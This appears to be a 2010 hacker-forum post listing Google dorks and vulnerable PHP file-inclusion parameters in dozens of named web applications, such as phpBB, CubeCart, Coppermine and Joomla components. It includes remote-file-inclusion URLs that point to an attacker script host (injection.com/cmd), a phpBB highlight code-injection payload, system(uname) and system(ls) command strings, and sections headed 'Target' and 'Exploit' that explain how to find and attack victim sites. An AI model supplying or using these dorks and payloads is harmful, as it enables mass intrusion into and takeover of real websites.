28/06/10

...::Bug::... — Google dorks for PHP file-inclusion parameters (register_globals-era RFI/LFI). Each `param=` below is the point where a remote URL or local path would be injected; the remote-URL form presumably only works where the target's PHP still permits URL includes, and the `?` appended after the injected URL is there to swallow the rest of the query string.

pm/lib.inc.php?sfx= pm
pm/lib.inc.php?pm_path= pm
artmedic-kleinanzeigen-path/index.php?id= artmedic
osticket/include/main.php?include_dir= osticket
include/main.php?config[search_disp]=include_dir= include
phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]= phpcoin
quick_reply.php?phpbb_root_path= quick_reply.php?phpbb_root_path=
zboard/include/write.php?dir= zboard
PATH/admin/plog-admin-functions.php?configbasedir= PATH
path_to_phpgreetz/content.php?content= path_to_phpgreetz
path_to_qnews/q-news.php?id= qnews
_conf/core/common-tpl-vars.php?confdir= core
votebox.php?VoteBoxPath= votebox.php?VoteBoxPath=
al_initialize.php?alpath= al_initialize.php?alpath=
include/db.php?GLOBALS[rootdp]= include
modules/news/archivednews.php?GLOBALS[language_home]= news
protection.php?siteurl= protection.php?siteurl=
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= AllMyGuests
classes.php?LOCAL_PATH= classes.php?LOCAL_PATH=
extensions/moblog/moblog_lib.php?basedir= moblog
modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= newbb_plus
phpWebLog/include/init.inc.php?G_PATH= phpWebLog
admin/objects.inc.php4?Server= admin
trg_news30/trgnews/install/article.php?dir= trgnews
block.php?Include=
block.php?Include= block.php?Include=
path_to_gallery/setup/index.php?GALLERY_BASEDIR= gallery
include/help.php?base= include
path_to_script/block.php?Include= block.php?Include=
examples/phonebook.php?page= phonebook.php?page=
examples/phonebook.php?page= examples
PHPNews/auth.php?path= PHPNews
include/print_category.php?dir= print_category.php?dir=
skin/zero_vote/login.php?dir= zero_vote
skin/zero_vote/setup.php?dir= zero_vote
skin/zero_vote/ask_password.php?dir= zero_vote
gui/include/sql.php?include_path= gui
webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini= webmail
email.php?login=cer_skin= email.php?login=cer_skin=
PhotoGal/ops/gals.php?news_file= PhotoGal
oneadmin/config.php?path[docroot]= oneadmin
skin/zero_vote/setup.php?dir= skin
xcomic/initialize.php?xcomicRootPath= xcomic
skin/zero_vote/error.php?dir= skin
admin_modules/admin_module_captions.inc.php?config[path_src_include]= admin_modules
admin_modules/admin_module_rotimage.inc.php?config[path_src_include]= admin_modules
admin_modules/admin_module_delcomments.inc.php?config[path_src_include]= admin_modules
admin_modules/admin_module_delimage.inc.php?config[path_src_include]= admin_modules
admin_modules/admin_module_deldir.inc.php?config[path_src_include]= admin_modules
src/index_overview.inc.php?config[path_src_include]= src
src/index_leftnavbar.inc.php?config[path_src_include]= src
src/image-gd.class.php?config[path_src_include]= src
src/image.class.php?config[path_src_include]= src
src/album.class.php?config[path_src_include]= src
src/show_random.inc.php?config[path_src_include]= src
yappa-ng/src/index_overview.inc.php?config[path_src_include]= yappa
phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY= phpgedview
dotproject/modules/files/index_table.php?root_dir= dotproject
CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]= CubeCart
inc/formmail.inc.php?script_root= formmail.inc.php?script_root=
e107/e107_handlers/secure_img_render.php?p= e107
path_of_cpcommerce/_functions.php?prefix= cpcommerce
p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM= uppc
yabbse/Sources/Packages.php?sourcedir= yabbse
gadgets/Blog/BlogModel.php?path=
gadgets/Blog/BlogModel.php?path= gadgets
learnlinc/clmcpreload.php?CLPATH= learnlinc
modernbill/samples/news.php?DIR= modernbill
family/phpgedview/index.php?PGV_BASE_DIRECTORY= phpgedview
nucleus/libs/globalfunctions.php?DIR_LIBS= nucleus
Popper/index.php?childwindow.inc.php?form= Popper
becommunity/community/index.php?pageurl= becommunity
catalog/includes/include_once.php?include_file= catalog
zb41/include/write.php?dir= zb41
phpprojekt/lib/authform.inc.php?path_pre= phpprojekt
achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot= achievo
globals.php3?LangCookie=.example.com
/main.php?sayfa= inurl:main.php?sayfa=
/zipndownload.php?PP_PATH= Powered by: PhotoPost PHP 4.6
skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer CMS
/components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:com_facileforms site:.ar
main.php?open=
main.php?open=
/surveys/survey.inc.php?path= inurl:surveys
components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= com_mtree
index_principal.php?pagina= index_principal.php?pagina=
template.php?name= template.php?name=
main.php?link= main.php?link=
index.php?open= index.php?open=
index.php?visualizar= index.php?visualizar=
index.php?screen= index.php?screen=
index.php?Load= index.php?Load=
index.php?Language= index.php?Language=
index2.php?DoAction= index2.php?DoAction=
index0.php?show= index0.php?show=
index2.php?x= index2.php?x=
al_initialize.php?alpath= Powered by AutoLinks Pro
components/com_performs/performs.php?mosConfig_absolute_path= com_performs
1. allinurl:my_egallery site:.org
my_egallery: /modules/My_eGallery/public/displayCategory.php?
basepath=http://www.injection.com/cmd?
2. allinurl:xgallery site:.org
xgallery: /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. allinurl:coppermine site:.org
coppermine: /modules/coppermine/themes/default/theme.php?
THEME_DIR=http://www.injection.com/cmd?
4. allinurl:4nAlbum site:.org
4nAlbum: /modules/4nAlbum/public/displayCategory.php?basepath=
5. allinurl:PNphpBB2 site:.org
6. allinurl:/modules.php?name=allmyguests
AllMyGuests: /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
7. allinurl:/Popper/index.php?
/Popper/index.php? : /Popper/index.php?childwindow.inc.php?form=
8. allinurl:kietu/hit_js.php
kietu/index.php?kietu[url_hit]=http://www.injection.com/cmd?
9. keyword : "Powered by phpBB 2.0.6"
&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.injection.com/cmd?
10. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
11. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=http://www.injection.com/cmd?
12. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.injection.com/cmd?
13. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.injection.com/cmd?

15. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
allinurl:ihm.php?p=http://www.injection.com/cmd?
16. allinurl:modules.php?name=Forums
/modules.php?name=http://www.injection.com/cmd?
17. allinurl:.php?bodyfile=
18. allinurl:/default.php?page=home
19. allinurl:/folder.php?id=
20. allinurl:main.php?pagina=
21. allinurl:AshNews or allinurl:/ashnews.php
22. allinurl:ihm.php?p=*
23. inurl:option=frontpage
/index.php?option=frontpage&Itemid=system(uname) index.php?option=
frontpage&Itemid=system(ls)
24. allinurl:shoutbox/expanded.php filetype:php
/shoutbox/expanded.php?conf=
25. inurl:option=frontpage
index.php?option=frontpage&Itemid=system(uname) index.php?option=
frontpage&Itemid=system(ls)
26. allinurl:shoutbox/expanded.php filetype:php
/shoutbox/expanded.php?conf=
Here is another set of paths you can also try for injection (same `config[path_src_include]` parameter as above; the last one needs `admin_ok=1` in the same request):
=====================================================================
http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=
http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=
http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=
http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
http://www.target.com/src/index_overview.inc.php?config[path_src_include]=
http://www.target.com/src/image-gd.class.php?config[path_src_include]=
http://www.target.com/src/album.class.php?config[path_src_include]=
http://www.target.com/src/show_random.inc.php?config[path_src_include]=
http://www.target.com/src/main.inc.php?config[path_src_include]=
http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=
Target :
========
Find targets on Google with these keywords:
1.allinurl:*.php?page=*
2.allinurl:*.php?content=*
3.allinurl:*.php?file=*
4.allinurl:*.php?filename=*
5.allinurl:*.php?link=*
6.allinurl:*.php?view=*
7.allinurl:*.php?sec=*
8.allinurl:*.php?document=*
9.allinurl:*.php?p=*
10.allinurl:*.php?x=*
Exploit:
=========
1.http://www.target.com/target.php?page=[injected URL or path]
2.http://www.target.com/target.php?content=[injected URL or path]
3.http://www.target.com/target.php?file=
4.http://www.target.com/target.php?filename=
5.http://www.target.com/target.php?link=
6.http://www.target.com/target.php?view=
7.http://www.target.com/target.php?sec=
8.http://www.target.com/target.php?document=
9.http://www.target.com/target.php?p=
10.http://www.target.com/target.php?x=
Palembang Security Hackers
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/include/new-visitor.inc.php?lvc_include_dir=
/path_of_cpcommerce/_functions.php?prefix=
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/main.php?x=
/index.php/main.php?x=
/index.php?include=
/index.php?x=
/index.php?open=
/index.php?visualizar=
/template.php?pagina=
/index.php?pagina=
/index.php?inc=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/include/new-visitor.inc.php?lvc_include_dir=
/path_of_cpcommerce/_functions.php?prefix=
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/main.php?x=
/index.php/main.php?x=
/index.php?open=
/index.php?visualizar=
/template.php?pagina=
/index.php?pagina=
/index.php?inc=
More strings
index.php?leng=
index.php?page=
index.php?rev=
index.php?main=
index.php?show=
index.php?x=
index.php?inc=
index.php?menu=
index.php?aktie=
index.php?s=
index.php?p=
index.php?principal=
index.php?url=
index.php?file=
index.php?do=
index.php?side=
index.php?f=
index.php?display=
index.php?webpage=
index.php?content=
index.php?source=
index.php?texto=
index.php?go=
index.php?contents=
index.php?meio=
index.php?miolo=
index.php?section=
index.php?configFile=
index.php?op=
index.php?id=
index.php?corpo=
index.php?article=
index.php?Itemid=
index.php?product_id=
index.php?lang=
index.php?showtopic=
index.php?option=
index.php?link=
index.php?module=
index.php?submenu=
index.php?cat=
index.php?visualizar=
index.php?open=
index.php?include=
/phplinks/index.php?show=
blank.php?path=
site.php?content=
impresion.php?f1=
topicos.php?area=
/shoutbox/expanded.php?conf=

becommunity/community/index.php?pageurl=
/bb_lib/checkdb.inc.php?libpach=
becommunity/community/index.php?pageurl=
/bb_lib/checkdb.inc.php?libpach=
livre_include.php?no_connect=lol&chem_absolu=
cutenews/inc/shows.inc.php?cutepath=
admin/common.inc.php?base_path=
sources/login.php?fil_config=
moosegallery/display.php?type=
pictures.php?x=
base.php?menu=
main.php?page=
main.php?file=
main.php?ver=
main.php?dir=
main.php?side=
main.php?doc=
main.php?x=
main.php?lk=
main.php?pbody=
main.php?menu=
main.php?op=
mainfile.php?MAIN_PATH=
padrao.php?conteudo=
pages.php?content=
page.php?page=
print.php?pagename=
home.php?x=
disb.php?lugar=
index2.php?secao=
index2.php?center=
index2.php?content=
index2.php?area=
index2.php?link=
index2.php?id=
Strings on sites:
index2.php?fight=
index2.php?id=
index2.php?music=
index2.php?record=
index2.php?p=
index2.php?home=
index2.php?site=
index2.php?radio=
site.php?Tipo=
site.php?nav=
site.php?comsocial=
site.php?pagina=
site.php?opcao= site.php?menu=
site.php?area=
template.php?pagina=
modules.php?name=
index1.php?link=
index1.php?center=
index1.php?inside=
